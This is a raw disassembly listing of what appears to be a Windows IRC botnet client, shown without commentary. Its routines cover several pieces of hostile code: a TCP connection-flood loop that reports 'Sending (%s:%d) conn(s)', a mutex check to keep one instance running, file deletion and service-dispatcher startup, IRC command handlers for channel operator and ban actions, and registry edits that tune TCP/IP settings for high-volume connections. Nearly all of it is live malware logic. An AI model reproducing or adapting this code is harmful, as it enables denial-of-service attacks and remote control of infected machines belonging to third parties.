loc_418700: ; CODE XREF: sub_4182BA+341�j
; sub_4182BA+367�j ...
xor eax, eax
pop edi
pop esi
inc eax
pop ebx
leave
retn 4
; ---------------------------------------------------------------------------
loc_41870A: ; CODE XREF: sub_4182BA+3D8�j
call esi ; dword_437188
cmp [ebp+var_40], ebx
mov dword ptr [ebp+var_C+4], eax
jnz short loc_41873B
cmp [ebp+var_3C], ebx
jnz short loc_418740
push dword ptr [ebp+var_20]
lea eax, [ebp+var_240]
push eax
push edi
lea eax, [ebp+var_F0]
push offset aSCreatedProces ; "%s Created process: \"%s\", PID: <%d>"
push eax
push [ebp+arg_0]
call sub_41CE4A
add esp, 18h
loc_41873B: ; CODE XREF: sub_4182BA+458�j
cmp [ebp+var_3C], ebx
jz short loc_418762
loc_418740: ; CODE XREF: sub_4182BA+45D�j
push dword ptr [ebp+var_20]
lea eax, [ebp+var_240]
push eax
push edi
lea eax, [ebp+var_F0]
push offset aSCreatedProces ; "%s Created process: \"%s\", PID: <%d>"
push eax
push [ebp+arg_0]
call sub_41CDD4
add esp, 18h
loc_418762: ; CODE XREF: sub_4182BA+484�j
cmp [ebp+var_44], ebx
jz loc_41887C
push 0FFFFFFFFh
push [ebp+var_28]
call dword_43707C ; WaitForSingleObject
call esi ; dword_437188
sub eax, dword ptr [ebp+var_C+4]
xor edx, edx
mov ecx, 3E8h
push 3Ch
div ecx
xor edx, edx
mov ecx, 15180h
pop esi
mov [ebp+var_2B8], bl
div ecx
mov ecx, 0E10h
mov eax, edx
xor edx, edx
div ecx
mov ecx, eax
mov eax, edx
xor edx, edx
div esi
cmp ecx, ebx
mov esi, edx
mov dword ptr [ebp+var_C+4], eax
jbe short loc_4187EA
cmp ecx, 1
mov eax, offset aHour ; " hour"
jz short loc_4187C1
mov eax, offset aHours ; " hours"
loc_4187C1: ; CODE XREF: sub_4182BA+500�j
push eax
push ecx
lea eax, [ebp+var_330]
push offset aDS ; " %d%s"
push eax
call sub_429B03
lea eax, [ebp+var_330]
push eax
lea eax, [ebp+var_2B8]
push eax
call sub_42A5E0
add esp, 18h
loc_4187EA: ; CODE XREF: sub_4182BA+4F6�j
push esi
lea eax, [ebp+var_330]
push dword ptr [ebp+var_C+4]
push offset a_2d_2d ; " %.2d:%.2d"
push eax
call sub_429B03
lea eax, [ebp+var_330]
push eax
lea eax, [ebp+var_2B8]
push eax
call sub_42A5E0
add esp, 18h
cmp [ebp+var_3C], ebx
mov esi, offset aSProcessSSTota ; "%s Process %s: \"%s\", Total %s Time: %s."...
jnz short loc_418850
lea eax, [ebp+var_2B8]
push eax
lea eax, [ebp+var_240]
push offset aIhfnL6b5x ; "/iHFN/l6B5X/"
push eax
push offset aSfe3h0kclgx0 ; "SFe3H0kCLgx0"
push edi
lea eax, [ebp+var_F0]
push esi
push eax
push [ebp+arg_0]
call sub_41CE4A
add esp, 20h
cmp [ebp+var_3C], ebx
jz short loc_41887C
loc_418850: ; CODE XREF: sub_4182BA+563�j
lea eax, [ebp+var_2B8]
push eax
lea eax, [ebp+var_240]
push offset aIhfnL6b5x ; "/iHFN/l6B5X/"
push eax
push offset aSfe3h0kclgx0 ; "SFe3H0kCLgx0"
push edi
lea eax, [ebp+var_F0]
push esi
push eax
push [ebp+arg_0]
call sub_41CDD4
add esp, 20h
loc_41887C: ; CODE XREF: sub_4182BA+4AB�j
; sub_4182BA+594�j
cmp [ebp+var_28], ebx
jz short loc_41888A
push [ebp+var_28]
call dword_437044 ; CloseHandle
loc_41888A: ; CODE XREF: sub_4182BA+5C5�j
cmp [ebp+var_24], ebx
jz loc_418A2A
push [ebp+var_24]
call dword_437044 ; CloseHandle
jmp loc_418A2A
; ---------------------------------------------------------------------------
loc_4188A1: ; CODE XREF: sub_4182BA+2CE�j
push 10h
lea eax, [ebp+var_14]
push ebx
push eax
call sub_429760
push 44h
lea eax, [ebp+var_13C]
pop esi
push esi
push ebx
push eax
call sub_429760
add esp, 18h
lea eax, [ebp+var_14]
mov [ebp+var_13C], esi
mov [ebp+var_10C], bx
push eax
lea eax, [ebp+var_13C]
push eax
push ebx
push ebx
push 28h
push ebx
push ebx
lea eax, [ebp+var_240]
push ebx
push eax
push ebx
call dword_4370D8 ; CreateProcessA
cmp eax, 1
jnz short loc_418947
xor eax, eax
cmp [ebp+var_54], 1
setz al
push eax
push 1
call sub_427DAA
mov esi, dword_437190
pop ecx
pop ecx
push 7D0h
call esi ; dword_437190
call sub_4235A4
push 64h
call esi ; dword_437190
push offset a3un9w_temux_5y ; "3Un9W.TEMuX.5ythl/YiVnR/J9IiO.VPA7i1"
push [ebp+arg_0]
call sub_41CAB4
pop ecx
pop ecx
push 3E8h
call esi ; dword_437190
mov ecx, [ebp+arg_0]
call sub_41CA82
call dword_456E58 ; WSACleanup
push ebx
call dword_4370D4 ; ExitProcess
loc_418947: ; CODE XREF: sub_4182BA+637�j
cmp [ebp+var_40], ebx
mov esi, offset aYdidb16dnmq_ ; "YdidB16dnMQ."
mov edi, offset aSSSSExecutingF ; "%s %s %s: %s executing file: %s."
jnz short loc_418980
lea eax, [ebp+var_240]
push eax
push esi
push offset aQvdspRbq6w0 ; "QvDsp/rBQ6w0"
push offset aW3nki_guvjx ; "w3NKI.gUvJx/"
push offset a6hwiyOatg9_6n5 ; "6HWiy/OAtg9.6N5aw.affEY1"
lea eax, [ebp+var_F0]
push edi
push eax
push [ebp+arg_0]
call sub_41CE4A
add esp, 20h
loc_418980: ; CODE XREF: sub_4182BA+69A�j
cmp [ebp+var_3C], ebx
jz loc_418A2A
lea eax, [ebp+var_240]
push eax
push esi
push offset aQvdspRbq6w0 ; "QvDsp/rBQ6w0"
push offset aW3nki_guvjx ; "w3NKI.gUvJx/"
push offset a6hwiyOatg9_6n5 ; "6HWiy/OAtg9.6N5aw.affEY1"
lea eax, [ebp+var_F0]
push edi
push eax
push [ebp+arg_0]
call sub_41CDD4
add esp, 20h
jmp short loc_418A2A
; ---------------------------------------------------------------------------
loc_4189B5: ; CODE XREF: sub_4182BA+7F�j
cmp [ebp+var_40], ebx
mov esi, dword_437170
mov edi, offset aHuudgYqzdz ; "HuuDG/YQZDz/"
jnz short loc_4189FB
cmp [ebp+var_3C], ebx
jnz short loc_418A00
cmp [ebp+var_60], ebx
mov dword ptr [ebp+var_C+4], offset a6hwiyOatg9_6n5 ; "6HWiy/OAtg9.6N5aw.affEY1"
jnz short loc_4189D9
mov dword ptr [ebp+var_C+4], edi
loc_4189D9: ; CODE XREF: sub_4182BA+71A�j
call esi ; dword_437170
push eax
push offset aNd4qzY5xml0rna ; "nD4Qz/y5xMl0RNAQI05pV11/XzinP/s/R0A."
push dword ptr [ebp+var_C+4]
lea eax, [ebp+var_F0]
push offset aSSD ; "%s %s <%d>"
push eax
push [ebp+arg_0]
call sub_41CE4A
add esp, 18h
loc_4189FB: ; CODE XREF: sub_4182BA+709�j
cmp [ebp+var_3C], ebx
jz short loc_418A2A
loc_418A00: ; CODE XREF: sub_4182BA+70E�j
cmp [ebp+var_60], ebx
jz short loc_418A0A
mov edi, offset a6hwiyOatg9_6n5 ; "6HWiy/OAtg9.6N5aw.affEY1"
loc_418A0A: ; CODE XREF: sub_4182BA+749�j
call esi ; dword_437170
push eax
push offset aNd4qzY5xml0rna ; "nD4Qz/y5xMl0RNAQI05pV11/XzinP/s/R0A."
push edi
lea eax, [ebp+var_F0]
push offset aSSD ; "%s %s <%d>"
push eax
push [ebp+arg_0]
call sub_41CDD4
add esp, 18h
loc_418A2A: ; CODE XREF: sub_4182BA+2D7�j
; sub_4182BA+5D3�j ...
push [ebp+var_70]
call sub_423623
pop ecx
push ebx
call dword_437174 ; ExitThread
sub_4182BA endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418A3A proc near ; CODE XREF: sub_418AD3+DF�p
; sub_418AD3+225�p
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push esi
push edi
mov edi, [ebp+arg_0]
push dword ptr [edi]
call dword_4372A4 ; gethostbyname
mov esi, eax
test esi, esi
jnz short loc_418A58
push 0FFFFFFFEh
pop eax
jmp short loc_418ACF
; ---------------------------------------------------------------------------
loc_418A58: ; CODE XREF: sub_418A3A+17�j
push 10h
lea eax, [ebp+var_10]
push 0
push eax
call sub_429760
movsx eax, word ptr [esi+0Ah]
push eax
lea eax, [ebp+var_C]
push eax
mov eax, [esi+0Ch]
push dword ptr [eax]
call sub_429420
mov ax, [esi+8]
add esp, 18h
mov [ebp+var_10], ax
push [ebp+arg_4]
call dword_4372C4 ; ntohs
push dword ptr [edi]
mov [ebp+var_E], ax
call sub_41E3EC
mov [ebp+var_C], eax
pop ecx
movsx eax, [ebp+var_10]
push 0
push 1
push eax
call dword_4372BC ; socket
mov esi, eax
test esi, esi
jl short loc_418AC8
lea eax, [ebp+var_10]
push 10h
push eax
push esi
call dword_4372CC ; connect
test eax, eax
jge short loc_418ACD
push esi
call sub_42F1A0
pop ecx
loc_418AC8: ; CODE XREF: sub_418A3A+74�j
or eax, 0FFFFFFFFh
jmp short loc_418ACF
; ---------------------------------------------------------------------------
loc_418ACD: ; CODE XREF: sub_418A3A+85�j
mov eax, esi
loc_418ACF: ; CODE XREF: sub_418A3A+1C�j
; sub_418A3A+91�j
pop edi
pop esi
leave
retn
sub_418A3A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418AD3 proc near ; DATA XREF: sub_40A9FE+7AD4�o
var_13C = dword ptr -13Ch
var_138 = byte ptr -138h
var_B8 = byte ptr -0B8h
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 13Ch
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 48h
mov esi, eax
pop ecx
lea edi, [ebp+var_13C]
rep movsd
mov esi, dword_437188
mov dword ptr [eax+11Ch], 1
mov eax, [ebp+var_13C]
mov [ebp+var_8], eax
call esi ; dword_437188
mov ecx, [ebp+var_38]
mov [ebp+arg_0], eax
lea eax, [ebp+var_138]
xor ebx, ebx
cmp [ebp+var_24], ebx
mov [ebp+var_14], eax
mov eax, [ebp+var_34]
mov [ebp+var_10], ecx
mov [ebp+var_4], eax
mov edi, offset aVfeso_qcgdt_ ; "vfEsO.QcgDt."
jnz short loc_418B57
cmp [ebp+var_28], ebx
jnz short loc_418B5C
push [ebp+var_30]
push eax
lea eax, [ebp+var_138]
push ecx
push eax
push edi
lea eax, [ebp+var_B8]
push offset aSSendingSDDCon ; "%s -> Sending (%s:%d) (%d) connects(s) "...
push eax
push [ebp+var_8]
call sub_41CE4A
add esp, 20h
loc_418B57: ; CODE XREF: sub_418AD3+59�j
cmp [ebp+var_28], ebx
jz short loc_418B84
loc_418B5C: ; CODE XREF: sub_418AD3+5E�j
push [ebp+var_30]
lea eax, [ebp+var_138]
push [ebp+var_34]
push [ebp+var_38]
push eax
push edi
lea eax, [ebp+var_B8]
push offset aSSendingSDDC_0 ; "%s -> Sending (%s:%d) (%d) conn(s) for "...
push eax
push [ebp+var_8]
call sub_41CDD4
add esp, 20h
loc_418B84: ; CODE XREF: sub_418AD3+87�j
cmp [ebp+var_4], ebx
jnz loc_418C6A
mov [ebp+var_4], ebx
call esi ; dword_437188
sub eax, [ebp+arg_0]
mov edi, 3E8h
xor edx, edx
mov ecx, edi
div ecx
cmp eax, [ebp+var_30]
ja short loc_418BED
mov ebx, dword_437190
loc_418BAB: ; CODE XREF: sub_418AD3+116�j
push [ebp+var_10]
lea eax, [ebp+var_14]
push eax
call sub_418A3A
pop ecx
cmp eax, 0FFFFFFFFh
pop ecx
jnz short loc_418BC1
push edi
jmp short loc_418BD9
; ---------------------------------------------------------------------------
loc_418BC1: ; CODE XREF: sub_418AD3+E9�j
mov eax, [ebp+var_4]
mov ecx, 1F4h
cdq
idiv ecx
inc [ebp+var_4]
cmp edx, 1F3h
jnz short loc_418BDB
push 0Ah
loc_418BD9: ; CODE XREF: sub_418AD3+EC�j
call ebx ; dword_437190
loc_418BDB: ; CODE XREF: sub_418AD3+102�j
call esi ; dword_437188
sub eax, [ebp+arg_0]
xor edx, edx
mov ecx, edi
div ecx
cmp eax, [ebp+var_30]
jbe short loc_418BAB
loc_418BEB: ; CODE XREF: sub_418AD3+273�j
; sub_418AD3+287�j
xor ebx, ebx
loc_418BED: ; CODE XREF: sub_418AD3+D0�j
push [ebp+var_2C]
call sub_423623
cmp [ebp+var_24], ebx
pop ecx
mov edi, offset aAsqfy_k1uah0 ; "AsQfy.K1uah0"
mov esi, offset aSSSDSentDConnS ; "%s %s (%s:%d) Sent: (%d) conn(s) for (%"...
jnz short loc_418C33
cmp [ebp+var_28], ebx
jnz short loc_418C38
push [ebp+var_30]
lea eax, [ebp+var_138]
push [ebp+var_34]
push [ebp+var_38]
push eax
push edi
push offset aVfeso_qcgdt_ ; "vfEsO.QcgDt."
lea eax, [ebp+var_B8]
push esi
push eax
push [ebp+var_8]
call sub_41CE4A
add esp, 24h
loc_418C33: ; CODE XREF: sub_418AD3+130�j
cmp [ebp+var_28], ebx
jz short loc_418C61
loc_418C38: ; CODE XREF: sub_418AD3+135�j
push [ebp+var_30]
lea eax, [ebp+var_138]
push [ebp+var_34]
push [ebp+var_38]
push eax
push edi
push offset aVfeso_qcgdt_ ; "vfEsO.QcgDt."
lea eax, [ebp+var_B8]
push esi
push eax
push [ebp+var_8]
call sub_41CDD4
add esp, 24h
loc_418C61: ; CODE XREF: sub_418AD3+163�j
; sub_418AD3+1DC�j ...
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 4
; ---------------------------------------------------------------------------
loc_418C6A: ; CODE XREF: sub_418AD3+B4�j
push 4
push [ebp+var_4]
call sub_42B39A
pop ecx
cmp eax, ebx
pop ecx
mov [ebp+var_18], eax
mov [ebp+var_C], ebx
jnz short loc_418CC7
push [ebp+var_2C]
call sub_423623
cmp [ebp+var_24], ebx
pop ecx
mov esi, offset aSErrorOutOfMem ; "%s Error: Out Of Mem!"
jnz short loc_418CAC
cmp [ebp+var_28], ebx
jnz short loc_418CB1
push edi
lea eax, [ebp+var_B8]
push esi
push eax
push [ebp+var_8]
call sub_41CE4A
add esp, 10h
loc_418CAC: ; CODE XREF: sub_418AD3+1BE�j
cmp [ebp+var_28], ebx
jz short loc_418C61
loc_418CB1: ; CODE XREF: sub_418AD3+1C3�j
push edi
lea eax, [ebp+var_B8]
push esi
push eax
push [ebp+var_8]
call sub_41CDD4
add esp, 10h
jmp short loc_418C61
; ---------------------------------------------------------------------------
loc_418CC7: ; CODE XREF: sub_418AD3+1AB�j
call esi ; dword_437188
mov ebx, dword_437190
mov edi, 3E8h
jmp short loc_418D31
; ---------------------------------------------------------------------------
loc_418CD6: ; CODE XREF: sub_418AD3+26A�j
mov eax, [ebp+var_18]
mov ecx, [ebp+var_C]
lea eax, [eax+ecx*4]
mov [ebp+var_1C], eax
mov eax, [eax]
test eax, eax
jz short loc_418D0C
push eax
call sub_42F1A0
pop ecx
jmp short loc_418D0C
; ---------------------------------------------------------------------------
loc_418CF1: ; CODE XREF: sub_418AD3+247�j
push [ebp+var_10]
lea eax, [ebp+var_14]
push eax
call sub_418A3A
pop ecx
cmp eax, 0FFFFFFFFh
pop ecx
mov ecx, [ebp+var_1C]
mov [ecx], eax
jnz short loc_418D1C
push edi
call ebx ; dword_437190
loc_418D0C: ; CODE XREF: sub_418AD3+213�j
; sub_418AD3+21C�j
call esi ; dword_437188
sub eax, [ebp+arg_0]
mov ecx, edi
xor edx, edx
div ecx
cmp eax, [ebp+var_30]
jbe short loc_418CF1
loc_418D1C: ; CODE XREF: sub_418AD3+234�j
inc [ebp+var_C]
mov eax, [ebp+var_C]
cmp eax, [ebp+var_4]
jnz short loc_418D2F
and [ebp+var_C], 0
push 1
call ebx ; dword_437190
loc_418D2F: ; CODE XREF: sub_418AD3+252�j
call esi ; dword_437188
loc_418D31: ; CODE XREF: sub_418AD3+201�j
sub eax, [ebp+arg_0]
mov ecx, edi
xor edx, edx
div ecx
cmp eax, [ebp+var_30]
jbe short loc_418CD6
mov eax, [ebp+var_C]
inc eax
cmp eax, [ebp+var_4]
jnz loc_418BEB
loc_418D4C: ; CODE XREF: sub_418AD3+291�j
call esi ; dword_437188
sub eax, [ebp+arg_0]
mov ecx, edi
xor edx, edx
div ecx
cmp eax, [ebp+var_30]
ja loc_418BEB
push 1
call ebx ; dword_437190
jmp short loc_418D4C
sub_418AD3 endp
; =============== S U B R O U T I N E =======================================
sub_418D66 proc near ; DATA XREF: .text:0043A008�o
; FUNCTION CHUNK AT 00418D7A SIZE 0000000C BYTES
call sub_418D70
jmp loc_418D7A
sub_418D66 endp
; =============== S U B R O U T I N E =======================================
sub_418D70 proc near ; CODE XREF: sub_418D66�p
; FUNCTION CHUNK AT 0041C40A SIZE 00000020 BYTES
mov ecx, offset dword_457E1C
jmp loc_41C40A
sub_418D70 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_418D66
loc_418D7A: ; CODE XREF: sub_418D66+5�j
push offset sub_418D86
call sub_42B869
pop ecx
retn
; END OF FUNCTION CHUNK FOR sub_418D66
; =============== S U B R O U T I N E =======================================
sub_418D86 proc near ; DATA XREF: sub_418D66:loc_418D7A�o
; FUNCTION CHUNK AT 0041C42A SIZE 0000000E BYTES
mov ecx, offset dword_457E1C
jmp loc_41C42A
sub_418D86 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418D90 proc near ; CODE XREF: sub_40A9FE+6B4�p
; sub_418FA1+24E�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
push ebx
push esi
mov esi, offset dword_4570C0
mov ebx, 0B8h
loc_418DA4: ; CODE XREF: sub_418D90+32�j
cmp byte ptr [esi], 0
jz short loc_418DC6
push [ebp+arg_0]
push esi
call dword_437178 ; lstrcmpiA
test eax, eax
jz short loc_418DC6
inc [ebp+var_4]
add esi, ebx
cmp esi, offset dword_457C40
jl short loc_418DA4
jmp short loc_418E08
; ---------------------------------------------------------------------------
loc_418DC6: ; CODE XREF: sub_418D90+17�j
; sub_418D90+25�j
mov esi, [ebp+var_4]
push edi
imul esi, 0B8h
push ebx
push 0
lea edi, dword_4570C0[esi]
push edi
call sub_429760
push 17h
push [ebp+arg_0]
push edi
call sub_429D10
push 9Fh
lea eax, dword_4570D8[esi]
push [ebp+arg_4]
push eax
call sub_429D10
add esp, 24h
inc dword_445D28
pop edi
loc_418E08: ; CODE XREF: sub_418D90+34�j
mov eax, [ebp+var_4]
pop esi
pop ebx
leave
retn
sub_418D90 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418E0F proc near ; CODE XREF: .text:0042C64F�p
var_428 = byte ptr -428h
var_324 = byte ptr -324h
var_220 = byte ptr -220h
var_11C = byte ptr -11Ch
var_11B = byte ptr -11Bh
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_7 = byte ptr -7
var_6 = byte ptr -6
var_5 = byte ptr -5
var_4 = byte ptr -4
push ebp
mov ebp, esp
sub esp, 428h
push ebx
call sub_417362
call sub_40A7C5
test eax, eax
jz short loc_418E37
push 1
call sub_427C81
pop ecx
push 1
call dword_4370D4 ; ExitProcess
loc_418E37: ; CODE XREF: sub_418E0F+16�j
xor ebx, ebx
push offset aMessageboxa ; "MessageBoxA"
push offset aUser32_dll ; "user32.dll"
mov [ebp+var_8], 0C8h
mov [ebp+var_7], bl
mov [ebp+var_6], 4
mov [ebp+var_5], bl
mov [ebp+var_4], 60h
call dword_437034 ; LoadLibraryA
push eax
call dword_437030 ; GetProcAddress
lea ecx, [ebp+var_8]
push 5
push ecx
push eax
call sub_42A520
add esp, 0Ch
test eax, eax
jnz short loc_418E77
loc_418E75: ; CODE XREF: sub_418E0F:loc_418E75�j
jmp short loc_418E75
; ---------------------------------------------------------------------------
loc_418E77: ; CODE XREF: sub_418E0F+64�j
push esi
push edi
push dword_445D20
push dword_445D24
call sub_416596
pop ecx
pop ecx
call sub_41567F
push 2
mov [ebp+var_18], offset dword_4439CC
mov [ebp+var_14], offset sub_422147
mov [ebp+var_10], ebx
mov [ebp+var_C], ebx
call dword_457004 ; SetErrorMode
lea eax, [ebp+var_428]
push 104h
push eax
push ebx
call dword_437070 ; GetModuleHandleA
push eax
call dword_43717C ; GetModuleFileNameA
push 40h
xor eax, eax
pop ecx
lea edi, [ebp+var_11B]
mov [ebp+var_11C], bl
push ebx
rep stosd
push dword_4439A4
stosw
stosb
lea eax, [ebp+var_11C]
push eax
push ebx
call dword_437260
mov esi, dword_4370B4
lea eax, [ebp+var_11C]
push eax
push offset dword_457D18
call esi ; dword_4370B4
lea eax, [ebp+var_11C]
push eax
lea eax, [ebp+var_324]
push eax
call esi ; dword_4370B4
mov esi, offset dword_4439A8
lea eax, [ebp+var_324]
push esi
push eax
lea eax, [ebp+var_220]
push offset dword_445D68
push eax
call sub_429B03
lea eax, [ebp+var_324]
push esi
push eax
call sub_4278B2
add esp, 18h
test eax, eax
pop edi
pop esi
jz short loc_418F7F
lea eax, [ebp+var_428]
push 1
push eax
push offset byte_445013
push offset dword_444F14
push dword_444F10
call sub_421409
lea eax, [ebp+var_220]
push eax
call sub_4221E4
add esp, 18h
push 1
call dword_4370D4 ; ExitProcess
loc_418F7F: ; CODE XREF: sub_418E0F+139�j
lea eax, [ebp+var_18]
push eax
call dword_45701C ; StartServiceCtrlDispatcherA
test eax, eax
jnz short loc_418F9A
lea eax, [ebp+var_220]
push eax
call sub_4221E4
pop ecx
loc_418F9A: ; CODE XREF: sub_418E0F+17C�j
xor eax, eax
pop ebx
leave
retn 10h
sub_418E0F endp
; =============== S U B R O U T I N E =======================================
sub_418FA1 proc near ; DATA XREF: sub_4222F7+C�o
; sub_42245D+15F�o
var_3B0 = byte ptr -3B0h
var_398 = byte ptr -398h
var_380 = byte ptr -380h
var_374 = qword ptr -374h
var_368 = dword ptr -368h
var_364 = byte ptr -364h
var_358 = qword ptr -358h
var_350 = dword ptr -350h
var_34C = dword ptr -34Ch
var_348 = dword ptr -348h
var_344 = dword ptr -344h
var_2CC = dword ptr -2CCh
var_2B8 = byte ptr -2B8h
var_1B8 = byte ptr -1B8h
sub esp, 334h
push ebx
push ebp
push esi
push edi
xor ebx, ebx
push offset aGx000032 ; "gx000032"
push ebx
push ebx
call dword_4370E0 ; CreateMutexA
mov dword_457F64, eax
call dword_437170 ; RtlGetLastWin32Error
cmp eax, 0B7h
jnz short loc_418FD3
push ebx
call dword_4370D4 ; ExitProcess
loc_418FD3: ; CODE XREF: sub_418FA1+29�j
push offset aNxruj_viib6 ; "nxruJ.vIib6/"
mov edi, offset aSS_1 ; "%s %s"
push offset aTy2nt0oi2yk ; "ty2nT0oI2YK/"
push edi
push ebx
call sub_4234A7
xor ebp, ebp
inc ebp
push ebp
push offset byte_445013
push offset dword_444F14
push dword_444F10
call sub_421340
mov esi, eax
add esp, 20h
cmp esi, ebx
jz short loc_41905D
push 80h
push esi
call dword_437068 ; SetFileAttributesA
mov [esp+35Ch+var_348], ebx
jmp short loc_41903A
; ---------------------------------------------------------------------------
loc_41901D: ; CODE XREF: sub_418FA1+A2�j
cmp [esp+35Ch+var_348], 3
jge short loc_419045
push esi
call dword_437060 ; DeleteFileA
inc [esp+360h+var_34C]
push 7D0h
call dword_437190 ; Sleep
loc_41903A: ; CODE XREF: sub_418FA1+7A�j
push esi
call sub_4277C0
test eax, eax
pop ecx
jnz short loc_41901D
loc_419045: ; CODE XREF: sub_418FA1+81�j
push offset byte_445013
push offset dword_444F14
push dword_444F10
call sub_420F6C
add esp, 0Ch
loc_41905D: ; CODE XREF: sub_418FA1+68�j
mov esi, dword_437188
call esi ; dword_437188
push eax
call sub_429B8F
pop ecx
lea eax, [esp+364h+var_348]
push eax
call dword_4370D0 ; QueryPerformanceCounter
lea eax, [esp+368h+var_344]
push eax
call dword_43718C ; QueryPerformanceFrequency
cmp [esp+36Ch+var_34C], ebx
jl short loc_4190D2
jg short loc_419090
cmp [esp+36Ch+var_350], ebx
jbe short loc_4190D2
loc_419090: ; CODE XREF: sub_418FA1+E7�j
cmp [esp+36Ch+var_344], ebx
jl short loc_4190D2
jg short loc_41909E
cmp [esp+36Ch+var_348], ebx
jbe short loc_4190D2
loc_41909E: ; CODE XREF: sub_418FA1+F5�j
push [esp+36Ch+var_344]
push [esp+370h+var_348]
push [esp+374h+var_34C]
push [esp+378h+var_350]
call sub_42B2F0
push ecx
push ecx ; double
mov dword ptr [esp+374h+var_358], eax
mov dword ptr [esp+374h+var_358+4], edx
fild [esp+374h+var_358]
fstp [esp+374h+var_374]
call sub_42A706
pop ecx
pop ecx
call sub_42A9E0
jmp short loc_4190D4
; ---------------------------------------------------------------------------
loc_4190D2: ; CODE XREF: sub_418FA1+E5�j
; sub_418FA1+ED�j ...
call esi ; dword_437188
loc_4190D4: ; CODE XREF: sub_418FA1+12F�j
mov dword_457E58, eax
lea eax, [esp+36Ch+var_1B8]
push eax
push 202h
call dword_456E78 ; WSAStartup
test eax, eax
jz short loc_4190F8
push 0FFFFFFFEh
call dword_4370D4 ; ExitProcess
loc_4190F8: ; CODE XREF: sub_418FA1+14D�j
cmp dword_457034, ebx
jnz short loc_419107
call sub_427BC4
jmp short loc_419118
; ---------------------------------------------------------------------------
loc_419107: ; CODE XREF: sub_418FA1+15D�j
push offset aYdidb16dnmq_ ; "YdidB16dnMQ."
push offset dword_676418
call sub_429B03
pop ecx
pop ecx
loc_419118: ; CODE XREF: sub_418FA1+164�j
push offset aAqejv_njvii_y8 ; "aQeJV.nJvIi.y8Ri./b5L.q."
push offset aTy2nt0oi2yk ; "ty2nT0oI2YK/"
push edi
push 5
mov [esp+388h+var_368], ebx
call sub_4234A7
add esp, 10h
mov esi, eax
lea eax, [esp+378h+var_368]
push eax
push ebx
push ebx
push offset sub_41BD1E
push ebx
push ebx
call dword_437180 ; CreateThread
imul esi, 2724h
push offset a5gcpxGycn21n1z ; "5GCpx/gYCn21N1Zsj.w3Ty30"
push offset aFfec81uznt81 ; "fFEC81UzNT81"
push edi
push 3
mov dword_46D72C[esi], eax
mov [esp+3A0h+var_2CC], ebp
call sub_4234A7
add esp, 10h
mov esi, eax
lea eax, [esp+390h+var_380]
mov edi, dword_437180
push eax
lea eax, [esp+394h+var_364]
push ebx
push eax
push offset sub_422009
push ebx
push ebx
call edi ; dword_437180
imul esi, 2724h
push offset aTy2nt0oi2yk ; "ty2nT0oI2YK/"
push offset dword_446348
push 4
mov dword_46D72C[esi], eax
call sub_4234A7
add esp, 0Ch
mov esi, eax
lea eax, [esp+3A8h+var_398]
push eax
lea eax, [esp+3ACh+var_2B8]
push ebx
push eax
push offset sub_41EBE9
push ebx
push ebx
call edi ; dword_437180
imul esi, 2724h
mov dword_46D72C[esi], eax
call sub_402BD7
push 0B80h
push ebx
push offset dword_4570C0
call sub_429760
push offset aRPrivmsg1GodDa ; "r PRIVMSG $1 god damnit,hard bitchslaps"...
push offset aSlaps ; "slaps"
call sub_418D90
push offset aRPrivmsg1Slaps ; "r PRIVMSG $1 slaps for You!!"
push offset aSlap ; "slap"
call sub_418D90
push offset aRPrivmsg1_ ; "r PRIVMSG $1 :."
push offset off_4462D0
call sub_418D90
push offset aR1_ ; "r $1 :."
push offset aCtc2 ; "ctc2"
call sub_418D90
push offset aRModeChanO1 ; "r MODE $chan +o $1"
push offset aOps ; "ops"
call sub_418D90
push offset aRModeChanV1 ; "r MODE $chan +v $1"
push offset aVoice ; "voice"
call sub_418D90
push offset aRModeChanH1 ; "r MODE $chan +h $1"
push offset aHalfop ; "halfop"
call sub_418D90
add esp, 44h
push offset aRModeChanB1 ; "r MODE $chan +b $1"
push offset aBan ; "ban"
call sub_418D90
push ebp
push offset a5000 ; "5000"
push offset aWaittokillserv ; "WaitToKillServiceT"
mov esi, 80000002h
push offset aSystemCurrentc ; "SYSTEM\\CurrentControlSet\\Control"
push esi
call sub_421409
push 0FFFEh
mov edi, offset aSystemCurren_0 ; "SYSTEM\\CurrentControlSet\\Services\\Tcpip"...
push offset aMaxuserport ; "MaxUserPort"
push edi
push esi
call sub_4213E8
push 1Eh
push offset aTcptimedwaitde ; "TcpTimedWaitDelay"
push edi
push esi
call sub_4213E8
push ebp
push offset aStricttimewait ; "StrictTimeWaitSeqCheck"
push edi
push esi
call sub_4213E8
add esp, 4Ch
push ebp
push offset aTcp1323opts ; "Tcp1323Opts"
push edi
push esi
call sub_4213E8
push 3EBC0h
push offset aGlobalmaxtcpwi ; "GlobalMaxTcpWindowSize"
push edi
push esi
call sub_4213E8
push 3EBC0h
push offset aTcpwindowsize ; "TcpWindowSize"
push edi
push esi
call sub_4213E8
push ebp
push offset aEnablepmtudisc ; "EnablePMTUDiscovery"
push edi
push esi
call sub_4213E8
add esp, 40h
push ebx
push offset aEnablepmtubhde ; "EnablePMTUBHDetect"
push edi
push esi
call sub_4213E8
push ebp
push offset aSackopts ; "SackOpts"
push edi
push esi
call sub_4213E8
push 40h
push offset aDefaultttl ; "DefaultTTL"
push edi
push esi
call sub_4213E8
push 2
